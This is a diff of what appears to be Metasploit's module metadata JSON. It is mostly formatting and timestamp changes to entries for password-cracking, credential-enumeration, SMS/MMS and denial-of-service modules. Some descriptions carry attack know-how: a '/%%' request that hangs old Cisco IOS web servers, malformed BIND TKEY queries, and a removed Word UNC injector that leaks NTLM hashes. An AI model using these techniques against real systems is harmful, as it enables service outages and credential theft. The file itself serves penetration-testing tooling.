"description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from various web applications.\n Atlassian uses PBKDF2-HMAC-SHA1 which is 12001 in hashcat.\n PHPass uses phpass which is 400 in hashcat.\n Mediawiki is MD5 based and is 3711 in hashcat.\n Apache Superset, some Flask and Werkzeug apps is pbkdf2-sha256 and is 10900 in hashcat",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2023-02-18 18:12:12 +0000",
+ "mod_time": "2025-05-07 21:38:27 +0000",
"path": "/modules/auxiliary/analyze/crack_webapps.rb",
"is_install_path": true,
"ref_name": "analyze/crack_webapps",
@@ -12436,6 +12565,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -12465,20 +12599,14 @@
"h00die"
],
"description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from Windows systems.\n LANMAN is format 3000 in hashcat.\n NTLM is format 1000 in hashcat.\n MSCASH is format 1100 in hashcat.\n MSCASH2 is format 2100 in hashcat.\n NetNTLM is format 5500 in hashcat.\n NetNTLMv2 is format 5600 in hashcat.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2023-02-18 18:12:12 +0000",
+ "mod_time": "2025-05-07 21:38:27 +0000",
"path": "/modules/auxiliary/analyze/crack_windows.rb",
"is_install_path": true,
"ref_name": "analyze/crack_windows",
@@ -12486,6 +12614,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -12503,9 +12636,7 @@
"auxiliary_analyze/modbus_zip": {
"name": "Extract zip from Modbus communication",
"fullname": "auxiliary/analyze/modbus_zip",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -12513,21 +12644,15 @@
"José Diogo Monteiro ",
"Luis Rosa "
],
- "description": "This module is able to extract a zip file sent through Modbus from a pcap.\n Tested with Schneider TM221CE16R",
- "references": [
-
- ],
+ "description": "This module is able to extract a zip file sent through Modbus from a pcap.\n Tested with Schneider TM221CE16R.",
+ "references": [],
"platform": "",
"arch": "",
"rport": 502,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2019-06-18 14:08:47 +0000",
+ "mod_time": "2025-05-07 21:38:27 +0000",
"path": "/modules/auxiliary/analyze/modbus_zip.rb",
"is_install_path": true,
"ref_name": "analyze/modbus_zip",
@@ -12535,19 +12660,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_bnat/bnat_router": {
"name": "BNAT Router",
"fullname": "auxiliary/bnat/bnat_router",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -12563,34 +12689,25 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-04 12:09:08 +0000",
"path": "/modules/auxiliary/bnat/bnat_router.rb",
"is_install_path": true,
"ref_name": "bnat/bnat_router",
"check": false,
"post_auth": false,
"default_credential": false,
- "notes": {
- },
+ "notes": {},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_bnat/bnat_scan": {
"name": "BNAT Scanner",
"fullname": "auxiliary/bnat/bnat_scan",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -12606,34 +12723,25 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2019-03-05 03:38:51 +0000",
+ "mod_time": "2025-05-04 12:09:08 +0000",
"path": "/modules/auxiliary/bnat/bnat_scan.rb",
"is_install_path": true,
"ref_name": "bnat/bnat_scan",
"check": false,
"post_auth": false,
"default_credential": false,
- "notes": {
- },
+ "notes": {},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_client/hwbridge/connect": {
"name": "Hardware Bridge Session Connector",
"fullname": "auxiliary/client/hwbridge/connect",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -12642,7 +12750,7 @@
],
"description": "The Hardware Bridge (HWBridge) is a standardized method for\n Metasploit to interact with Hardware Devices. This extends\n the normal exploit capabilities to the non-ethernet realm and\n enables direct hardware and alternative bus manipulations. You\n must have compatible bridging hardware attached to this machine or\n reachable on your network to use any HWBridge exploits.\n\n Use this exploit module to connect the physical HWBridge which\n will start an interactive hwbridge session. You can launch a hwbridge\n server locally by using compliant hardware and executing the local_hwbridge\n module. After that module has started, pass the HWBRIDGE_BASE_URL\n options to this connector module.",
"references": [
- "URL-http://opengarages.org/hwbridge"
+ "URL-https://web.archive.org/web/20170206145056/http://opengarages.org/hwbridge/"
],
"platform": "",
"arch": "",
@@ -12663,7 +12771,7 @@
"https"
],
"targets": null,
- "mod_time": "2021-01-05 14:59:46 +0000",
+ "mod_time": "2025-05-04 23:26:52 +0000",
"path": "/modules/auxiliary/client/hwbridge/connect.rb",
"is_install_path": true,
"ref_name": "client/hwbridge/connect",
@@ -12671,19 +12779,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_client/iec104/iec104": {
"name": "IEC104 Client Utility",
"fullname": "auxiliary/client/iec104/iec104",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -12691,20 +12800,14 @@
"Michael John "
],
"description": "This module allows sending 104 commands.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 2404,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-04 23:26:52 +0000",
"path": "/modules/auxiliary/client/iec104/iec104.rb",
"is_install_path": true,
"ref_name": "client/iec104/iec104",
@@ -12712,6 +12815,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -12725,30 +12833,22 @@
"auxiliary_client/mms/send_mms": {
"name": "MMS Client",
"fullname": "auxiliary/client/mms/send_mms",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r "
],
- "description": "This module sends an MMS message to multiple phones of the same carrier.\n You can use it to send a malicious attachment to phones.",
- "references": [
-
- ],
+ "description": "This module sends an MMS message to multiple phones of the same carrier.\n You can use it to send a malicious attachment to phones.",
+ "references": [],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-04 23:26:52 +0000",
"path": "/modules/auxiliary/client/mms/send_mms.rb",
"is_install_path": true,
"ref_name": "client/mms/send_mms",
@@ -12756,40 +12856,35 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_client/sms/send_text": {
"name": "SMS Client",
"fullname": "auxiliary/client/sms/send_text",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r "
],
- "description": "This module sends a text message to multiple phones of the same carrier.\n You can use it to send a malicious link to phones.\n\n Please note that you do not use this module to send a media file (attachment).\n In order to send a media file, please use auxiliary/client/mms/send_mms instead.",
- "references": [
-
- ],
+ "description": "This module sends a text message to multiple phones of the same carrier.\n You can use it to send a malicious link to phones.\n\n Please note that you do not use this module to send a media file (attachment).\n In order to send a media file, please use auxiliary/client/mms/send_mms instead.",
+ "references": [],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-04 23:26:52 +0000",
"path": "/modules/auxiliary/client/sms/send_text.rb",
"is_install_path": true,
"ref_name": "client/sms/send_text",
@@ -12797,26 +12892,27 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_client/smtp/emailer": {
"name": "Generic Emailer (SMTP)",
"fullname": "auxiliary/client/smtp/emailer",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et "
],
- "description": "This module can be used to automate email delivery.\n This code is based on Joshua Abraham's email script for social\n engineering.",
+ "description": "This module can be used to automate email delivery.\n This code is based on Joshua Abraham's email script for social\n engineering.",
"references": [
"URL-http://spl0it.org/"
],
@@ -12836,7 +12932,7 @@
"smtps"
],
"targets": null,
- "mod_time": "2022-03-10 18:03:35 +0000",
+ "mod_time": "2025-05-04 23:26:52 +0000",
"path": "/modules/auxiliary/client/smtp/emailer.rb",
"is_install_path": true,
"ref_name": "client/smtp/emailer",
@@ -12844,19 +12940,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_client/telegram/send_message": {
"name": "Telegram Message Client",
"fullname": "auxiliary/client/telegram/send_message",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -12865,18 +12962,12 @@
"Gaurav Purswani"
],
"description": "This module can be used to send a document and/or message to\n multiple chats on telegram. Please refer to the module\n documentation for info on how to retrieve the bot token and corresponding chat\n ID values.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
"mod_time": "2024-01-07 15:04:17 +0000",
"path": "/modules/auxiliary/client/telegram/send_message.rb",
@@ -12885,20 +12976,15 @@
"check": false,
"post_auth": false,
"default_credential": false,
- "notes": {
- },
+ "notes": {},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_cloud/aws/enum_ec2": {
"name": "Amazon Web Services EC2 instance enumeration",
"fullname": "auxiliary/cloud/aws/enum_ec2",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -12907,20 +12993,14 @@
"RageLtMan "
],
"description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all EC2 instances associated\n with the account",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2023-06-26 16:57:08 +0000",
+ "mod_time": "2025-06-20 13:20:44 +0000",
"path": "/modules/auxiliary/cloud/aws/enum_ec2.rb",
"is_install_path": true,
"ref_name": "cloud/aws/enum_ec2",
@@ -12934,43 +13014,31 @@
"Stability": [
"crash-safe"
],
- "Reliability": [
-
- ]
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_cloud/aws/enum_iam": {
"name": "Amazon Web Services IAM credential enumeration",
"fullname": "auxiliary/cloud/aws/enum_iam",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Aaron Soto "
],
- "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all IAM credentials associated\n with the account",
- "references": [
-
- ],
+ "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all IAM credentials associated\n with the account",
+ "references": [],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2021-05-27 15:15:31 +0000",
+ "mod_time": "2025-05-06 22:49:03 +0000",
"path": "/modules/auxiliary/cloud/aws/enum_iam.rb",
"is_install_path": true,
"ref_name": "cloud/aws/enum_iam",
@@ -12978,40 +13046,37 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_cloud/aws/enum_s3": {
"name": "Amazon Web Services S3 instance enumeration",
"fullname": "auxiliary/cloud/aws/enum_s3",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Aaron Soto "
],
- "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all S3 buckets associated\n with the account",
- "references": [
-
- ],
+ "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all S3 buckets associated\n with the account",
+ "references": [],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2021-05-27 15:15:31 +0000",
+ "mod_time": "2025-05-06 22:49:03 +0000",
"path": "/modules/auxiliary/cloud/aws/enum_s3.rb",
"is_install_path": true,
"ref_name": "cloud/aws/enum_s3",
@@ -13019,19 +13084,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_cloud/aws/enum_ssm": {
"name": "Amazon Web Services EC2 SSM enumeration",
"fullname": "auxiliary/cloud/aws/enum_ssm",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -13045,14 +13113,10 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-06-03 11:02:15 +0000",
+ "mod_time": "2025-05-21 10:45:08 +0000",
"path": "/modules/auxiliary/cloud/aws/enum_ssm.rb",
"is_install_path": true,
"ref_name": "cloud/aws/enum_ssm",
@@ -13063,25 +13127,19 @@
"SideEffects": [
"ioc-in-logs"
],
- "Reliability": [
-
- ],
+ "Reliability": [],
"Stability": [
"crash-safe"
]
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_cloud/kubernetes/enum_kubernetes": {
"name": "Kubernetes Enumeration",
"fullname": "auxiliary/cloud/kubernetes/enum_kubernetes",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -13090,9 +13148,7 @@
"Spencer McIntyre"
],
"description": "Enumerate a Kubernetes API to report useful resources such as available namespaces,\n pods, secrets, etc.\n\n Useful resources will be highlighted using the HIGHLIGHT_NAME_PATTERN option.",
- "references": [
-
- ],
+ "references": [],
"platform": "Linux,Unix",
"arch": "",
"rport": null,
@@ -13123,9 +13179,7 @@
"SideEffects": [
"ioc-in-logs"
],
- "Reliability": [
-
- ],
+ "Reliability": [],
"Stability": [
"crash-safe"
]
@@ -13176,9 +13230,7 @@
"auxiliary_crawler/msfcrawler": {
"name": "Metasploit Web Crawler",
"fullname": "auxiliary/crawler/msfcrawler",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -13186,20 +13238,14 @@
"et "
],
"description": "This auxiliary module is a modular web crawler, to be used in conjunction with wmap (someday) or standalone.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 80,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-05-23 12:23:27 +0000",
+ "mod_time": "2025-05-21 10:38:34 +0000",
"path": "/modules/auxiliary/crawler/msfcrawler.rb",
"is_install_path": true,
"ref_name": "crawler/msfcrawler",
@@ -13207,60 +13253,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
- },
- "auxiliary_docx/word_unc_injector": {
- "name": "Microsoft Word UNC Path Injector",
- "fullname": "auxiliary/docx/word_unc_injector",
- "aliases": [
-
- ],
- "rank": 300,
- "disclosure_date": null,
- "type": "auxiliary",
- "author": [
- "SphaZ "
- ],
- "description": "This module modifies a .docx file that will, upon opening, submit stored\n netNTLM credentials to a remote host. It can also create an empty docx file. If\n emailed the receiver needs to put the document in editing mode before the remote\n server will be contacted. Preview and read-only mode do not work. Verified to work\n with Microsoft Word 2003, 2007, 2010, and 2013. In order to get the hashes the\n auxiliary/server/capture/smb module can be used.",
- "references": [
- "URL-https://web.archive.org/web/20140527232608/http://jedicorp.com/?p=534"
- ],
- "platform": "",
- "arch": "",
- "rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
- "targets": null,
- "mod_time": "2022-03-10 18:03:35 +0000",
- "path": "/modules/auxiliary/docx/word_unc_injector.rb",
- "is_install_path": true,
- "ref_name": "docx/word_unc_injector",
- "check": false,
- "post_auth": false,
- "default_credential": false,
- "notes": {
- },
- "session_types": false,
- "needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/android/android_stock_browser_iframe": {
"name": "Android Stock Browser Iframe DOS",
"fullname": "auxiliary/dos/android/android_stock_browser_iframe",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2012-12-01",
"type": "auxiliary",
@@ -13276,14 +13284,10 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/android/android_stock_browser_iframe.rb",
"is_install_path": true,
"ref_name": "dos/android/android_stock_browser_iframe",
@@ -13291,6 +13295,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -13304,9 +13313,7 @@
"auxiliary_dos/apple_ios/webkit_backdrop_filter_blur": {
"name": "iOS Safari Denial of Service with CSS",
"fullname": "auxiliary/dos/apple_ios/webkit_backdrop_filter_blur",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2018-09-15",
"type": "auxiliary",
@@ -13316,20 +13323,16 @@
"description": "This module exploits a vulnerability in WebKit on Apple iOS.\n If successful, the device will restart after viewing the webpage.",
"references": [
"URL-https://twitter.com/pwnsdx/status/1040944750973595649",
- "URL-https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea",
+ "URL-http://web.archive.org/web/20220706175501/https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea",
"URL-https://nbulischeck.github.io/apple-safari-crash"
],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb",
"is_install_path": true,
"ref_name": "dos/apple_ios/webkit_backdrop_filter_blur",
@@ -13337,19 +13340,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-os-restarts"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/cisco/cisco_7937g_dos": {
"name": "Cisco 7937G Denial-of-Service Attack",
"fullname": "auxiliary/dos/cisco/cisco_7937g_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2020-06-02",
"type": "auxiliary",
@@ -13364,12 +13368,8 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
"mod_time": "2020-08-21 13:13:33 +0000",
"path": "/modules/auxiliary/dos/cisco/cisco_7937g_dos.py",
@@ -13378,20 +13378,15 @@
"check": false,
"post_auth": false,
"default_credential": false,
- "notes": {
- },
+ "notes": {},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/cisco/cisco_7937g_dos_reboot": {
"name": "Cisco 7937G Denial-of-Service Reboot Attack",
"fullname": "auxiliary/dos/cisco/cisco_7937g_dos_reboot",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2020-06-02",
"type": "auxiliary",
@@ -13406,12 +13401,8 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
"mod_time": "2020-08-21 09:01:45 +0000",
"path": "/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.py",
@@ -13420,27 +13411,22 @@
"check": false,
"post_auth": false,
"default_credential": false,
- "notes": {
- },
+ "notes": {},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/cisco/ios_http_percentpercent": {
"name": "Cisco IOS HTTP GET /%% Request Denial of Service",
"fullname": "auxiliary/dos/cisco/ios_http_percentpercent",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2000-04-26",
"type": "auxiliary",
"author": [
"aushack "
],
- "description": "This module triggers a Denial of Service condition in the Cisco IOS\n HTTP server. By sending a GET request for \"/%%\", the device becomes\n unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module\n tested successfully against a Cisco 1600 Router IOS v11.2(18)P.",
+ "description": "This module triggers a Denial of Service condition in the Cisco IOS\n HTTP server. By sending a GET request for \"/%%\", the device becomes\n unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module\n tested successfully against a Cisco 1600 Router IOS v11.2(18)P.",
"references": [
"BID-1154",
"CVE-2000-0380",
@@ -13449,14 +13435,10 @@
"platform": "",
"arch": "",
"rport": 80,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb",
"is_install_path": true,
"ref_name": "dos/cisco/ios_http_percentpercent",
@@ -13464,26 +13446,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/cisco/ios_telnet_rocem": {
"name": "Cisco IOS Telnet Denial of Service",
"fullname": "auxiliary/dos/cisco/ios_telnet_rocem",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2017-03-17",
"type": "auxiliary",
"author": [
"Artem Kondratenko"
],
- "description": "This module triggers a Denial of Service condition in the Cisco IOS\n telnet service affecting multiple Cisco switches. Tested against Cisco\n Catalyst 2960 and 3750.",
+ "description": "This module triggers a Denial of Service condition in the Cisco IOS\n telnet service affecting multiple Cisco switches. Tested against Cisco\n Catalyst 2960 and 3750.",
"references": [
"BID-96960",
"CVE-2017-3881",
@@ -13493,14 +13476,10 @@
"platform": "",
"arch": "",
"rport": 23,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/cisco/ios_telnet_rocem.rb",
"is_install_path": true,
"ref_name": "dos/cisco/ios_telnet_rocem",
@@ -13508,19 +13487,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/dhcp/isc_dhcpd_clientid": {
"name": "ISC DHCP Zero Length ClientID Denial of Service Module",
"fullname": "auxiliary/dos/dhcp/isc_dhcpd_clientid",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -13537,14 +13517,10 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2019-03-05 03:38:51 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb",
"is_install_path": true,
"ref_name": "dos/dhcp/isc_dhcpd_clientid",
@@ -13552,19 +13528,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/dns/bind_tkey": {
"name": "BIND TKEY Query Denial of Service",
"fullname": "auxiliary/dos/dns/bind_tkey",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2015-07-28",
"type": "auxiliary",
@@ -13573,23 +13550,19 @@
"throwawayokejxqbbif",
"wvu "
],
- "description": "This module sends a malformed TKEY query, which exploits an\n error in handling TKEY queries on affected BIND9 'named' DNS servers.\n As a result, a vulnerable named server will exit with a REQUIRE\n assertion failure. This condition can be exploited in versions of BIND\n between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0\n through 9.10.2-P2.",
+ "description": "This module sends a malformed TKEY query, which exploits an\n error in handling TKEY queries on affected BIND9 'named' DNS servers.\n As a result, a vulnerable named server will exit with a REQUIRE\n assertion failure. This condition can be exploited in versions of BIND\n between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0\n through 9.10.2-P2.",
"references": [
"CVE-2015-5477",
- "URL-https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/",
+ "URL-http://web.archive.org/web/20190425014550/https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/",
"URL-https://kb.isc.org/article/AA-01272"
],
"platform": "",
"arch": "",
"rport": 53,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2018-11-16 12:18:28 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/dns/bind_tkey.rb",
"is_install_path": true,
"ref_name": "dos/dns/bind_tkey",
@@ -13597,19 +13570,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/dns/bind_tsig": {
"name": "BIND TSIG Query Denial of Service",
"fullname": "auxiliary/dos/dns/bind_tsig",
- "aliases": [
-
- ],
